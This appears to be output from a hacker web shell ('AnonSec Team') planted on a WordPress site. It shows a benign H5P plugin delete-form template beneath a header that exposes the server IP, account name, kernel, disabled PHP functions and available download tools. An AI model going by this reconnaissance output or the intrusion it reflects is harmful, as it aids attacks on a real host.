| Server IP : 93.127.179.156 / Your IP :
216.73.216.24 [
Web Server : LiteSpeed System : Linux nl-srv-web1124.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : u964240598 ( 964240598) PHP Version : 8.4.19 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u964240598/public_html/wp-content/plugins/h5p/admin/views/ |
Upload File : |
<?php
/**
* Display library delete form
*
* @package H5P
* @author Joubel <contact@joubel.com>
* @license MIT
* @link http://joubel.com
* @copyright 2014 Joubel
*/
?>
<div class="wrap">
<h2><?php print esc_html($library->title); ?></h2>
<form method="post" enctype="multipart/form-data" id="h5p-library-form">
<p><?php esc_html_e('Are you sure you wish to delete this H5P library?', $this->plugin_slug); ?></p>
<?php wp_nonce_field('h5p_library', 'lets_delete_this'); ?>
<input type="submit" name="submit" value="<?php esc_html_e('Do it!', $this->plugin_slug) ?>" class="button button-primary button-large"/>
</form>
</div>
Anon7 - 2022
AnonSec Team
